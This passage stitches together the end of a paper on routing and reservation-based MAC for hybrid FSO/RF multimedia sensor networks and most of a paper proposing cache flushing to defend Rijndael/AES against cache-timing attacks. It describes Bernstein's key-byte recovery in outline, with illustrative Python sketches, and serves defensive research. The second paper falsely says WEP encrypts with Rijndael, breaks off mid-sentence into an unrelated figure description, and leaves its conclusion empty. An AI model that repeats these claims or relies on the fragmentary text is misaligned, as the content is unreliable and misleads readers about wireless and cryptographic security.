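The COMB format of Figure 3, and the rule that intermediate CHs rewrite only the variable attributes, can be sketched as follows (field and function names are our illustrative assumptions):

```python
from dataclasses import dataclass

@dataclass
class CombMessage:
    """Sketch of the COMB probe from Figure 3 (field names follow the text).
    Fixed attributes are set by the source and never modified in flight;
    variable attributes are rewritten by each intermediate cluster head."""
    # fixed attributes
    source_id: int
    sink_id: int
    deviation_angle: float          # alpha: the direction a path may traverse
    src_to_sink_hop_count: int
    # variable attributes
    hop_count: int = 0              # hops from the source to the current CH
    previous_hop: int = -1          # identifier of the current CH
    position: tuple = (0.0, 0.0)    # absolute coordinates of the current CH

def rebroadcast(msg: CombMessage, ch_id: int, ch_pos: tuple) -> CombMessage:
    """An intermediate CH updates only the variable attributes before forwarding."""
    return CombMessage(msg.source_id, msg.sink_id, msg.deviation_angle,
                       msg.src_to_sink_hop_count,
                       hop_count=msg.hop_count + 1,
                       previous_hop=ch_id,
                       position=ch_pos)
```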
A cluster head receiving a COMB calculates its distance from the destination (sink) CH. If the distance between the cluster head that received the COMB message and the sink CH is less than the distance between the source CH and the sink CH, and the receiving CH lies inside the communication sector of the source CH, then that CH becomes the next hop. The same procedure is repeated for all other CHs, and multiple delivery-guaranteed routing paths from the source CH to the sink CH are discovered; these paths use FSO links for multimedia transmission.
The next phase is to find the best routing path among the multiple paths already explored. To do so, we assume a Reference Line directly connecting the source CH and the destination CH. For each path, we calculate the distance between every CH along that path and the Reference Line, and then take the average:
Dpath = ( Σ i=1..N di ) / (HopCount - 1)
Figure 4 - Multipath Establishment Phase (four candidate paths, Path 1 to Path 4, from the source CH to the sink CH via cluster heads CH0-CH13; d1, d2, and d3 are the distances of CH1, CH2, and CH3 from the Reference Line)
Here, Dpath1 is computed from d1, d2, and d3, the distances of CH1, CH2, and CH3 from the Reference Line. Similarly, we find Dpath2, ..., DpathM, where M is the total number of routing paths explored from the source CH to the sink CH. We select for routing the multimedia application the path with the smallest value of Dpath. Once the best path has been explored, we can use FSO links and a corner-cube retro-reflector (CCR) for bandwidth-hungry applications.
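The reference-line selection rule above can be sketched as follows. This is a minimal illustration with our own function names; each path is represented by the coordinates of its intermediate CHs only, so the divisor equals HopCount - 1 as in the Dpath formula:

```python
import math

def point_line_distance(p, a, b):
    """Perpendicular distance from point p to the Reference Line through a and b."""
    (px, py), (ax, ay), (bx, by) = p, a, b
    num = abs((by - ay) * (px - ax) - (bx - ax) * (py - ay))
    return num / math.hypot(bx - ax, by - ay)

def best_path(paths, source, sink):
    """Return the path whose average deviation (Dpath) from the Reference Line
    joining source and sink is smallest. Each path is a non-empty list of the
    intermediate cluster-head coordinates (source and sink excluded), so
    len(path) == HopCount - 1."""
    def d_path(path):
        return sum(point_line_distance(ch, source, sink) for ch in path) / len(path)
    return min(paths, key=d_path)
```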
IV. MAC QOS PROVISIONING
Research efforts to provide MAC-layer QoS can be classified mainly into (i) channel access policies, (ii) scheduling and buffer management, and (iii) error control.
(i) Channel Access Policy
Motivated by the power-aware protocol [20], we define the Cluster-head Reservation Based MAC scheme (CRB-MAC).
We make the following assumptions:
i. All nodes are synchronized to a global time according to some synchronization scheme, and time is sliced into frames of fixed length.
ii. Loss of packets can only occur due to collisions or missed
deadlines.
iii. Admission control has been performed already, so that the
offered load can be sustained by the network.
iv. The network is stationary, i.e., there is no mobile node.
Let Y(i) be a node in the network, so that the total number of nodes is Ytotal = Σ i=1..N Y(i). The range R(x) of a cluster-head x contains the set of cluster-heads within its RF/FSO range:

R(x) = {h | h is in transmission range of cluster-head x}
There is a set R(x, y) which contains all cluster heads in the common range of two cluster-heads:

R(x, y) = R(x) ∩ R(y)
We assume that the geographic area of the network is
divided into rectangular grids of equal size. Each grid of size Ca x Cb covers at least one cluster head. Each cluster head has a geographic location (found via GPS) which is mapped on a one-to-one basis to a grid location.
Figure 5 - Cluster Head Grid (grids H(1,1), H(1,2), H(2,1), H(2,2) of size Ca x Cb; the circle marks a cluster head's communication range of radius R)
Each frame is divided into the Reservation Period (RP), during which nodes compete to establish new reservations or cancel reservations, and the Contention-Free Period (CFP), during which they send data packets without contention in their reserved transmission windows and sleep when they have no packet to send or receive.
The Reservation Period is divided into Reservation Period slots (RP-slots), each of a fixed length sufficient for three reservation messages to be transmitted.
The Contention-Free Period is divided into Contention-Free (CF) slots. Each CF-slot has a fixed length, long enough for the transmission of a data packet and an acknowledgment.
Each station keeps the reservation information in a Reservation Table (RT), which tracks the IDs of the nodes (within range) that are transmitting or receiving data during each Contention-Free slot. When a node joins the network, it has to stay awake for some period to hear the ongoing transmissions and update its reservation table.
Reservation Period
During the Reservation Period, two types of reservation procedures can take place: the Connection Establishment procedure and the Connection Cancelation procedure.
A station that needs to initiate a Connection Establishment
or Connection Cancelation can do so in the pre-specified
Reservation Slot for its grid.
A host in a grid H(x, y) can initiate a reservation procedure only during the reservation slot r such that r = 3x + 2y + 5. This ensures that only one reservation in a rectangular area of 3x3 grids can take place in any one reservation slot.
T(1, 1) T(1, 2) T(1, 3)
T(2, 1) T(2, 2) T(2, 3)
T(3, 1) T(3, 2) T(3, 3)
Figure 6- Reservation Slot using Grid
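Taking the slot formula exactly as stated, the grid-to-slot mapping and its 3x3 uniqueness property can be sketched and checked as follows (illustrative code, not the paper's implementation):

```python
def reservation_slot(x, y):
    """Slot assignment from Section IV, as given in the text: a host in grid
    H(x, y) may initiate a reservation only in slot r = 3x + 2y + 5."""
    return 3 * x + 2 * y + 5

# Within any 3x3 block of grids the assigned slots are pairwise distinct,
# so at most one reservation per slot can originate from that area.
slots = {reservation_slot(x, y) for x in range(3) for y in range(3)}
assert len(slots) == 9
```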
When a station needs to make a connection establishment or cancelation, it senses the channel to determine whether another station of the same grid is transmitting. The station proceeds with a transmission if the medium is determined to be idle for a specified interval. If the medium is found to be busy, or the sender's first message is not sent successfully, then the exponential back-off algorithm is followed and the station chooses a subsequent frame to re-initiate its request.
The Connection Establishment procedure takes place for a
real-time station every time a new real time session begins.
Datagram (non-real-time) traffic is not sensitive to delay, so nodes may buffer packets up to a "burst length" N and then make a request to send the whole burst. The reservation establishment involves the exchange of three control messages:
(a) A Connection Request CR(x, y) is sent by a node x to a
neighbor y for which it has real-time or non-real-time packets.
Packet length | Free Slots | Deadline for the real-time data packet
Figure 7(a) - Real-time data packet format
Packet length | Free Slots | Number of buffered non-real-time packets to be sent
Figure 7(b) - Non-real-time data packet format
(b) A Connection Acknowledgment CA(y, x) is sent by node y to neighbor x. The CR from x contains information about x's free slots. Node y scans all of its own free slots and compares them with the free slots of x. It then schedules the requested packet in a common free slot in its Reservation Table, and the receiver indicates in the CA which reserved slot(s) the sender should use:

RT(i) = {Fs | Fs ∈ XFs ∩ YFs}
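The slot-matching step in the CA message can be sketched as a set intersection; the earliest-slot tie-break below is our assumption, since the paper does not specify one:

```python
def schedule_common_slot(x_free, y_free):
    """Sketch of the CA step: the receiver picks a slot from the intersection
    of the sender's advertised free slots (x_free) and its own (y_free),
    i.e. RT(i) = {Fs | Fs in XFs ∩ YFs}. Returns the earliest common slot,
    or None if no common free slot exists."""
    common = set(x_free) & set(y_free)
    return min(common) if common else None
```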
(c) A Slot Reservation Broadcast SRB(x, y) is sent by node x to all other nodes and includes the slots that x has reserved. Thus all the nodes in the neighborhood also become aware of the reservation.
Figure 8 - Connection Establishment between Cluster Head X and Cluster Head Y (X sends a Connection Request (CR) to Y; Y replies with a Connection Acknowledgement (CA); Slot Reservation Broadcasts (SRB) then inform neighboring cluster heads such as Z)
The Connection Cancelation is invoked when a sender has no more packets to send during its real-time session. Two messages are involved in the Reservation Cancelation:
(a) The Connection Cancel CC(x, y) sent by a node x to node y
(b) The Connection Cancel Acknowledgment CC-ACK(y, x),
sent by node y to x.
Contention-Free Period
During the CFP, the stations wake up in the predetermined
transmission slots according to their Reservation Table, to
send or receive data packets, and sleep the rest of the period.
In each slot, the sender sends a data packet of the size it specified and receives an acknowledgment (ACK) sent by the receiver. If a node has no data to send or receive during a Contention-Free slot, it switches off. Once the reservation for a real-time session is established, it is kept until an explicit reservation cancelation is performed as described above. The sender uses the reserved slot to send its data packets until the session is over. Reservations for datagram traffic are valid only for the current frame, and after the CFP is over the hosts clear from their Reservation Tables those slots that carried non-real-time transmissions. Thus no explicit cancelation is needed for datagram reservations.
(ii) Scheduling and Buffer Management
The foundation of a proper QoS provisioning lies in the
appropriate service model that describes a set of offered
services. Existing QoS-aware networks, such as ATM, IntServ, and DiffServ, designed their service models based on the QoS requirements of applications in the corresponding network infrastructure. We have laid the foundation of our service model for a hybrid FSO-RF based multimedia network.
First, the multimedia data is classified into real-time and non-real-time data according to its delay requirements. To achieve the desired QoS for a real-time application, it is usually mandatory to maintain a specific bandwidth during the real-time transmission.
We categorize applications into the following classes.
• Bonded service represents real-time applications that require absolute continuity, i.e., the transmission of data cannot be interrupted during the session.
• Semi-bonded service represents real-time applications that can tolerate a reasonably short disconnection during the transmission.
Figure 9 - Wireless Multimedia Scheduler (sessions 1 to N feed a scheduler driven by MAC feedback and a channel-state monitor/predictor, which passes packets to the transceiver)
V. MAC QOS PROVISIONING PROOF
The defined changes at the MAC layer provide better QoS under the assumptions stated earlier in the paper. The hidden-node problem causes collisions in which certain critical information is lost. If connection establishment information is lost, the reservation tables can become inconsistent, and data-packet collisions may occur or Contention-Free slots may be wasted. When a CR packet collides, no reservation information is lost. When CA or SRB packets are lost, conflicting reservations can arise, which may result in data-packet collisions. When Connection Cancelation or CC-ACK packets are lost, reservation cancelation information may be lost and the slots may not be reservable by other hosts, so data slots remain unused.
We assume that a node initiates a reservation procedure with another node involving a CF-slot. To prove MAC QoS provisioning we use the following lemmas.
Lemma 1: A node k in the network can cause a reservation message to be missed by another node during the Connection
Establishment phase if and only if it is a few hops away, i.e., 1, 2, 3, or 4 hops away from the sender.
Lemma 2: All Connection Reservation Messages are received successfully by the nodes while any reservation procedure is taking place, if and only if, every node initiates its reservation procedure in its reserved slot.
Lemma 3: The protocol ensures that all nodes successfully update their reservation tables whenever a connection establishment or connection cancelation procedure takes place.
VI. CONCLUSION AND FUTURE WORK
We have presented a hybrid FSO/RF based model for wireless multimedia sensor networks. We have proposed a new routing protocol for such networks to provide energy-efficient real-time communication. As future work we plan to simulate our protocol and compare it with similar reservation-based protocols. We expect our protocol to consume less energy for routing multimedia data with minimum delay. At the MAC layer we use a fully distributed reservation scheme that is able to provide bandwidth guarantees and energy conservation using geographic information.
REFERENCES
[1] U. N. Okorafor and D. Kundur, "Efficient routing protocols for a free space optical sensor network," in Proc. 2nd IEEE Int. Conf. on Mobile Adhoc and Sensor Systems, Washington, DC, USA, Nov. 2005, pp. 251-258.
[2] S. Mao, D. Bushmitch, S. Narayanan, and S. Panwar, "MRTP: a multiflow real-time transport protocol for ad hoc networks," IEEE Transactions on Multimedia, vol. 8, no. 2, pp. 356-369, Apr. 2006.
[3] X. Yang and N. H. Vaidya, "A wakeup scheme for sensor networks: achieving balance between energy saving and end-to-end delay," RTAS, vol. 00, p. 19, 2004.
[4] R. Shah and J. Rabaey, "Energy aware routing for low energy ad hoc sensor networks," 2002.
[5] E. Felemban, C.-G. Lee, and E. Ekici, "MMSPEED: multipath multi-SPEED protocol for QoS guarantee of reliability and timeliness in wireless sensor networks," IEEE Transactions on Mobile Computing, vol. 5, no. 6, pp. 738-754, June 2006.
[6] M. Perillo and W. Heinzelman, "Sensor management policies to provide application QoS," Ad Hoc Networks (Elsevier), vol. 1, no. 2-3, pp. 235-246, 2003.
[7] A. Boulis and M. Srivastava, "Node-level energy management for sensor networks in the presence of multiple applications," in Proc. IEEE Int. Conf. on Pervasive Computing and Communications (PerCom), Dallas-Fort Worth, TX, USA, 2003, pp. 41-49.
[8] L. Savidge, H. Lee, H. Aghajan, and A. Goldsmith, "QoS based geographic routing for event-driven image sensor networks," in Proc. IEEE/CreateNet Int. Workshop on Broadband Advanced Sensor Networks (BaseNets), Boston, MA, Oct. 2005.
[9] K. Akkaya and M. Younis, "An energy-aware QoS routing protocol for wireless sensor networks," in Proc. Int. Conf. on Distributed Computing Systems Workshops, Washington, DC, 2003.
[10] V. Ramasubramanian and D. Mosse, "A circuit-based approach for routing in unidirectional links networks," INRIA Research Report 3292, 1997.
[11] V. Ramasubramanian and D. Mosse, "Statistical analysis of connectivity in unidirectional ad hoc networks," in Int. Workshop on Ad Hoc Networking (IWAHN), Vancouver, Canada, 2002.
[12] D. B. Johnson and D. A. Maltz, "Dynamic source routing in ad hoc wireless networks," in Mobile Computing, Imielinski and Korth, Eds., vol. 353, Kluwer Academic Publishers, 1996.
[13] Z. J. Haas, M. R. Pearlman, and P. Samar, "The zone routing protocol (ZRP) for ad hoc networks," Internet Draft, IETF Mobile Ad Hoc Networking (MANET) Working Group, 2001.
[14] V. Ramasubramanian, R. Chandra, and D. Mosse, "Providing a bidirectional abstraction for unidirectional ad hoc networks," in Proc. IEEE INFOCOM, New York, NY, USA, 2002, pp. 1258-1267.
[15] L. Bao and J. J. Garcia-Luna-Aceves, "Link-state routing in networks with unidirectional links," in Proc. Int. Conf. on Computer Communications and Networks (IC3N), Boston, MA, 1999, pp. 358-363.
[16] W. Dabbous, E. Duros, and T. Ernst, "Dynamic routing in networks with unidirectional links," in WOSBIS'97, Budapest, Hungary, Oct. 1997, pp. 35-47.
[17] M. Marina and S. Das, "Routing performance in the presence of unidirectional links in multihop wireless networks," in Proc. ACM MobiHoc, 2002, pp. 12-23.
[18] R. Prakash, "A routing algorithm for wireless ad hoc networks with unidirectional links," Wireless Networks, vol. 7, no. 6, pp. 617-625, 2001.
[19] S. Nesargi and R. Prakash, "A tunneling approach to routing with unidirectional links in mobile ad-hoc networks," in Proc. Ninth Int. Conf. on Computer Communications and Networks, 2000, pp. 522-527.
[20] M. Adamou, I. Lee, and I. Shin, "An energy efficient real-time medium access control protocol for wireless ad-hoc networks," in WIP session of IEEE Real-Time Systems Symposium, London, UK, 2001.
Minimizing Cache Timing Attack Using
Dynamic Cache Flushing (DCF) Algorithm
Jalpa Bani
Computer Science and Engineering Department
University of Bridgeport
Bridgeport, CT 06601
jbani@bridgeport.edu
Syed S. Rizvi
Computer Science and Engineering Department
University of Bridgeport
Bridgeport, CT 06601
srizvi@bridgeport.edu
Abstract—The Rijndael algorithm was unanimously chosen as the Advanced Encryption Standard (AES) by the panel of researchers at the National Institute of Standards and Technology (NIST) in October 2000. Since then, Rijndael has been used massively in various software as well as hardware entities for encrypting data. However, a few years back, Daniel Bernstein [2] devised a cache-timing attack capable of breaking Rijndael's seal that encapsulates the encryption key. In this paper, we propose a new Dynamic Cache Flushing (DCF) algorithm, a set of pragmatic software measures that would make Rijndael impregnable to the cache-timing attack. The simulation results demonstrate that the proposed DCF algorithm provides better security by performing encryption in constant time.
Keywords- dynamic cache flushing, Rijndael algorithm, timing attack.
I. INTRODUCTION
Rijndael is a block cipher adopted as an encryption standard by the U.S. government. It has been analyzed extensively and is now used widely worldwide, as was the case with its predecessor, the Data Encryption Standard (DES). Rijndael, the AES standard, is currently used in various fields. Due to its impressive efficiency [8], it is used in high-speed optical networks, in military applications that encrypt top-secret data, and in banking and financial applications where secure, real-time transfer of data is a top priority.
Microsoft has embraced Rijndael and implemented it in its much talked-about DotNet (.NET) Framework. DotNet 3.5 has a Rijndael implementation in the System.Security.Cryptography namespace. The DotNet framework is used by millions of developers around the world to develop software applications in numerous fields. In other words, the software implementation of Rijndael touches almost all the fields that implement cryptography through the DotNet framework.
Wireless network security is no exception. Wired Equivalent Privacy (WEP) is the protocol used in wireless networks to ensure a secure environment. When WEP is turned on in a wireless network, every packet of data that is transmitted from one station to another is first encrypted using the Rijndael algorithm by taking the packet's data payload and a secret encryption key called the WEP key. The encrypted data is then broadcast to stations registered on that wireless network. At the receiving end, the wireless-network-aware stations utilize the WEP key to decrypt data using the Rijndael algorithm. Rijndael supports a larger range of block and key sizes than AES: AES has a fixed block size of 128 bits and a key size of 128, 192, or 256 bits, whereas Rijndael can be specified with key and block sizes in any multiple of 32 bits, with a minimum of 128 bits and a maximum of 256 bits [6].
This algorithm implements the input, output, and cipher key, where each of the bit sequences may contain 128, 192, or 256 bits, with the condition that the input and output sequences have the same length. The algorithm provides the basic framework to make the code scalable. Look-up tables have been used to make the Rijndael algorithm faster, and operations are performed on a two-dimensional array of bytes called the state. The state consists of 4 rows of bytes, each of which contains Nb bytes, where Nb is the input sequence length divided by 32. During the start or end phase of an encryption or decryption operation, the bytes of the cipher input or output are copied from or to this state array.
The several operations implemented in this algorithm are listed below [9]:
• Key Schedule: an array of 32-bit words initialized from the cipher key. The cipher iterates through a number of cycles, or rounds, each of which uses Nk words from the key schedule. This can be considered an array of round keys, each containing Nk words.
• Finite Field Operations: operations performed in the finite field, each resulting in an element within that field. Finite field operations such as addition and multiplication, multiplicative inversion, multiplication using tables, and repeated shifts are performed.
• Rounds: at the start of the cipher, the input is copied into the internal state. An initial round key is then added, and the state is transformed by iterating a round function in a number of cycles. On completion, the final state is copied into the cipher output [1].
The round function is parameterized using a key schedule that consists of a one-dimensional array of 32-bit words, of which the lowest 4, 6, or 8 words are initialized with the cipher key. Several steps are carried out during this operation:
SubBytes: as shown in Fig. 1, a non-linear substitution step in which each byte is replaced with another according to a lookup table.
ShiftRows: a transposition step in which each row of the state is shifted cyclically by a certain number of steps, as shown in Fig. 2.
MixColumns: a mixing operation that operates on the columns of the state, combining the four bytes in each column, as shown in Fig. 3.
AddRoundKey: each byte of the state is combined with the round key; each round key is derived from the cipher key using a key schedule [1], as shown in Fig. 4.
• Final Round: the final round consists of the same operations as the round function except the MixColumns operation.
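As one concrete illustration of these steps, ShiftRows on a 4 x 4 state (Nb = 4, i.e., a 128-bit block) can be sketched as follows. This is a textbook model of the step, not the paper's code:

```python
def shift_rows(state):
    """Sketch of the ShiftRows step described above: row i of the 4 x Nb
    state is rotated cyclically left by i byte positions (shown here for
    Nb = 4, i.e. a 128-bit block)."""
    return [row[i:] + row[:i] for i, row in enumerate(state)]

state = [[0, 1, 2, 3],
         [4, 5, 6, 7],
         [8, 9, 10, 11],
         [12, 13, 14, 15]]
# Row 0 is unchanged; row 1 rotates by 1; row 2 by 2; row 3 by 3.
shifted = shift_rows(state)
```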
II. RELATED WORK
Parallelism, or parallel computing, has become a key aspect of high-performance computing today, and its fundamental advantages have deeply influenced modern processor designers. It has become a dominant paradigm in processor architecture in the form of the multicore processors available in personal computers today. Sharing processor resources such as cache memory, sharing memory maps in random access memory (RAM), and sharing the computational power of the math coprocessors during execution of multiple processes in the operating system have become an inevitable phenomenon. A few years back, Intel introduced hyper-threading technology in its Pentium 4 processors, wherein the sharing of processor resources between process threads is extended further by sharing memory caches. Shared access to the memory cache is a feature available in all the latest processors from Intel and AMD.
For all the talk about how parallel computing has made Central Processing Units (CPUs) very powerful today, the fundamental practice of sharing the memory cache across thread boundaries has opened doors for security vulnerabilities. The shared memory cache can permit malicious threads of a spy process to monitor the execution of another thread that implements Rijndael, allowing attackers to brute-force the encryption key [6, 7].
III. PROBLEM IN RIJNDAEL: CACHE TIMING ATTACK
Cache timing attack: the name speaks for itself. It belongs to a class of attacks that monitor the target cryptosystem and analyze the time taken to execute various steps of the cryptographic algorithm. In other words, the attack exploits the fact that every step in the algorithm takes a certain time to execute.

Figure 1. SubBytes
Figure 2. ShiftRows
Figure 3. MixColumns
Although the cache-timing attack was well known theoretically, it was only in April 2005 that researcher Daniel Bernstein [2, 4] published how a weakness of Rijndael can reveal timing information that can eventually be used to crack the encryption key. In his paper, Bernstein announced a successful cache-timing attack exploiting the timing characteristics of the table lookups.
Here is the simplest conceivable timing attack on Rijndael. AES software implementations like Rijndael that use look-up tables to perform internal operations of the cipher, such as S-boxes, are the ones most vulnerable to this attack. Consider, for example, the variable-index array lookup T0[k[0] ⊕ n[0]] near the beginning of the AES computation. An attacker may reason that the time for this array lookup depends on the array index, and that the time for the whole AES computation is well correlated with the time for this array lookup. As a result, the AES timings leak information about k[0] ⊕ n[0], and the attacker can calculate the exact value of k[0] from the distribution of AES timings as a function of n[0]. Similar comments apply to k[1] ⊕ n[1], k[2] ⊕ n[2], etc. Assume that the attacker watches the time taken by the victim to handle many inputs n, totals the AES times for each possible value of n[13], and observes that the overall AES time is maximum when n[13] is, say, 147. Suppose that the attacker also observes, by carrying out experiments with known keys k on a computer with the same AES software and the same CPU, that the overall AES time is maximum when k[13] ⊕ n[13] is, say, 8. The attacker concludes that the victim's key byte k[13] is 147 ⊕ 8 = 155. This implies that an attacker can easily attack a variable-time AES implementation and crack the encrypted data and eventually the key [2].
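The final XOR step of the attack described above can be sketched as follows. This is an illustrative function of ours; the hard part of the attack, the timing measurement itself, is omitted:

```python
def recover_key_byte(n_with_max_time, profiled_offset):
    """Sketch of the key-recovery step described in the text: if the victim's
    timings peak at plaintext byte n[13] = n_with_max_time, and profiling with
    known keys on identical hardware shows the peak occurs when
    k[13] XOR n[13] = profiled_offset, then the key byte is their XOR."""
    return n_with_max_time ^ profiled_offset

assert recover_key_byte(147, 8) == 155  # the example from the text
```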
Since in the Rijndael algorithm all look-up tables are stored in the cache, by running another thread, or in some other way, an attacker can extract information about the encrypted data from the cache. Fig. 5 shows that the AES implementation in OpenSSL does not take constant time. The measurement was taken on a Pentium M processor. It is a 128 x 128 array of blocks, where the X axis shows one key for each row of blocks and the Y axis shows one input for each column of blocks. Each (key, input) pair depicts the encryption process for that particular pair through the pattern of colors at that place. We can see the tremendous variability among blocks in Fig. 5. Due to this variability, an attacker can determine the weak point where the encryption took place just by analyzing the color pattern.
The cache-timing attack problem has been tackled through various approaches [3], each with its own pros and cons. For instance, Intel released a set of compilers targeting their latest 64-bit processors. These compilers take C++ code as input and output a set of machine instructions that do not use the CPU cache at all for temporary storage of data; in other words, the cache is effectively disabled.

Another suggestion was to place all the lookup tables in CPU registers rather than the CPU cache, but this would affect performance significantly. Hardware approaches are also being considered. It has been suggested to have a parallel Field-Programmable Gate Array (FPGA) or Application-Specific Integrated Circuit (ASIC) implementation with a separate coprocessor functioning alongside the existing CPU. This special coprocessor would contain logic circuitry that implements Rijndael. Timing attacks can thus be avoided by barring other processes from accessing the special coprocessor [5].
Figure 5. OpenSSL AES timings for 128 keys and 128 inputs on a Pentium M processor
Figure 4. AddRoundKey
IV. PROPOSED DYNAMIC CACHE FLUSHING (DCF)
ALGORITHM
Numerous attempts have been made to address the timing-attack loophole in AES. After a deep analysis of the logical steps involved in the Rijndael algorithm, we propose a novel technique to improve the existing Rijndael algorithm. Our approach replaces the variable-time AES algorithm with a constant-time (but not high-speed) AES algorithm known as DCF (Dynamic Cache Flushing). Here, constant means totally independent of the AES key and input. The resulting DCF algorithm is capable of standing strong against timing attacks.
In order to verify constant time, first we need to collect timings and then look for input-dependent patterns. For example, we can repeatedly measure the time taken by AES for one (key, input) pair, convert the distribution of timings into a small block of colors, and then repeat the same measurement for many keys and inputs.

A constant-time AES algorithm has the same block of colors for every (key, input) pair, as shown in Fig. 6. Fig. 6 is a 128 x 128 array of blocks. Here, the X axis indicates the key for each row of blocks and the Y axis shows the input for each column of blocks. The pattern of colors in a block reflects the distribution of timings for that (key, input) pair. Here, for all (key, input) pairs, the color pattern remains the same, due to the constant time. Hence, an attacker cannot easily figure out at which point in time the encryption of key and data took place. The DCF algorithm generates keys at a constant rate on today's popular dual-core CPUs.
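The timing-collection procedure just described can be sketched as follows (a hypothetical harness; `encrypt` stands in for whatever AES implementation is under test, and the noise tolerance is an arbitrary assumption):

```python
import time
import statistics

def collect_timings(encrypt, key, block, samples=1000):
    """Measure one (key, input) pair repeatedly; the returned list is the
    timing distribution that would be rendered as one block of colors."""
    timings = []
    for _ in range(samples):
        start = time.perf_counter_ns()
        encrypt(key, block)
        timings.append(time.perf_counter_ns() - start)
    return timings

def looks_constant_time(encrypt, keys, blocks, tolerance_ns=50):
    """Compare median timings across (key, input) pairs; a constant-time
    implementation should show no key- or input-dependent spread beyond noise."""
    medians = [statistics.median(collect_timings(encrypt, k, b))
               for k in keys for b in blocks]
    return max(medians) - min(medians) <= tolerance_ns
```

In practice the 128 x 128 figures correspond to calling `collect_timings` for each of 128 keys against 128 inputs and coloring each distribution.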
A. Description of the Proposed DCF Algorithm
The DCF algorithm is an improved version of Rijndael. In other words, the basic encryption/decryption process remains unchanged. However, a few additional steps are injected into the Rijndael algorithm that make it resilient to the cache-timing attack.
The DCF algorithm, as the name rightly suggests, flushes the cache while the encryption of data is in progress. In other words, the data that is copied by the program into the CPU cache during the encryption/decryption process is removed at periodic intervals. The motivation is that, during a cache-timing attack, the spy process tries to tap the data stored in lookup tables in the CPU cache. Since each instruction takes time to encrypt or decrypt the data, an attacker can break the data by taking the difference between a large body of timing data collected from the target machine for the plaintext bytes and a large body of reference timing data collected for each instruction. Fig. 5 shows that encryption/decryption takes place at varying, observable times, which can easily be determined by the spy process. If data in the CPU cache is flushed dynamically during the encryption or decryption process, it becomes much more difficult for the spy process to collect data for sampling purposes. In addition, no data in the cache implies that there is no specific place or point that refers to the encryption process, as shown in Fig. 6.

It should be noted in Fig. 6 that the graph maintains a uniform pattern during the entire encryption/decryption process. Due to this uniformity, an attacker faces difficulty in tracking the exact time frame when encryption/decryption took place. This is achieved by flushing the CPU cache at irregular intervals. Flushing the cache ensures that an attacker will not get enough insight into the data pattern during the encryption process by tapping the cache data. To increase the effectiveness of this approach, one can increase the frequency of cache flushing; this is a customizable parameter in the proposed DCF implementation. Further analysis of the DCF algorithm shows that it leads to more cache misses than cache hits. The cache misses are recovered by looking up the data in RAM, and this is the performance penalty we pay with this approach. But with the computing capability of today's high-end dual-core CPUs, this refetching of data elements from RAM can be tolerated.

It should be noted that completely disabling the cache is also an option [3], but in such a scenario the spy process might as well start tapping the RAM for encrypted data. Flushing the cache instead confuses the spy process and makes it difficult for attackers to derive a fixed pattern from the timing information and encrypted data samples.
Another feature intended in DCF algorithm is to
Figure 6. AES timings, using the constant-time AES algorithm, for 128 keys and 128 inputs
axis shows the time taken to execute that particular instruction. Fig. 8 shows the average time taken to fetch the input data Pi from the cache for that particular instruction xi0. Here, the X axis shows the data in cache memory and the Y axis shows the time taken to fetch that data. Due to the constant-time approach with cache flushing, Fig. 7 and Fig. 8 demonstrate that the average time converges to a constant value. Fig. 9 combines the timing graphs of Fig. 7 and Fig. 8, showing both the time to fetch the data and the time taken to execute the instruction that fetches it.

If we take the difference between the maximum values of the average time for fetching the data and the time to execute the instruction that fetches it, we get a negligible time difference, say ki. For any time difference between the timing data and the reference data, ki remains constant and very small due to cache flushing. This implies that, with constant timing information, it is not possible to determine the exact time taken to encrypt/decrypt the data. The performance of the DCF algorithm is found to be a little slower than that of the Rijndael algorithm. The performance penalty is due to cache flushing, which forces the processor to fetch the missing data from RAM or from a secondary disk. On the other hand, the security provided against attackers by the proposed DCF algorithm is impressive.
V. SIMULATION RESULTS
Here is a brief description of DCF during execution of the Rijndael algorithm. Assume that there is a huge data file that is being encrypted using the DCF algorithm. The flowchart in Fig. 10 portrays the logical flow of events. The file is read into a user-defined variable, "buffer". The password provided by the user is stored as the encryption key. Rijndael initializes itself by building the set of round tables and lookup tables in its data structures, which are used to process the data in the buffer. A timer is initialized, in nanoseconds, just before Rijndael starts encrypting the data in the buffer. During encryption, Rijndael combines the key and data in the round operations. During various steps of the encryption process, random delays are introduced using a Sleep(X) function to ensure that repeated sets of instructions do not exhibit the same execution timeline. Here, the amount of time 'X' for which the process is suspended is directly proportional to the total amount of time 'T' taken to process a chunk of data of size 'S'. When the timer becomes zero, the data is flushed from the cache using the cacheflush() function and the timer is reinitialized with a random time, which makes the encryption timing more unpredictable for the hacker. The timer is repeatedly reinitialized with a random value, and encryption proceeds with random delays, until all the data is processed (encrypted).

Figure 9. Graph showing the difference between the timing data and reference data

Figure 10. Dynamic Cache Flushing Algorithm Flowchart
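The flow just described can be sketched in outline as follows (a hypothetical sketch, not the authors' implementation: `flush_cache` stands in for the platform's cacheflush() primitive, and `encrypt_chunk` is a placeholder for the real Rijndael round processing):

```python
import random
import time

def flush_cache():
    """Placeholder for the platform cache-flush primitive (e.g. cacheflush())."""
    pass

def encrypt_chunk(key, chunk):
    """Placeholder for one Rijndael chunk encryption (XOR keeps the sketch runnable)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(chunk))

def dcf_encrypt(key, buffer, chunk_size=16, delay_factor=0.001):
    """Encrypt the buffer chunk by chunk, inserting random delays proportional
    to the per-chunk time T and flushing the cache when the random timer expires."""
    out = bytearray()
    deadline = time.perf_counter_ns() + random.randint(1, 5) * 1_000_000
    for i in range(0, len(buffer), chunk_size):
        start = time.perf_counter_ns()
        out += encrypt_chunk(key, buffer[i:i + chunk_size])
        elapsed = time.perf_counter_ns() - start          # T for this chunk of size S
        time.sleep(elapsed * delay_factor / 1e9)          # Sleep(X), X proportional to T
        if time.perf_counter_ns() >= deadline:            # the timer became zero
            flush_cache()
            deadline = time.perf_counter_ns() + random.randint(1, 5) * 1_000_000
    return bytes(out)
```

Because the placeholder cipher is an XOR, running `dcf_encrypt` twice with the same key returns the original buffer, which makes the control flow easy to check; the flush deadline and delay factor are illustrative values only.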
VI. CONCLUSION
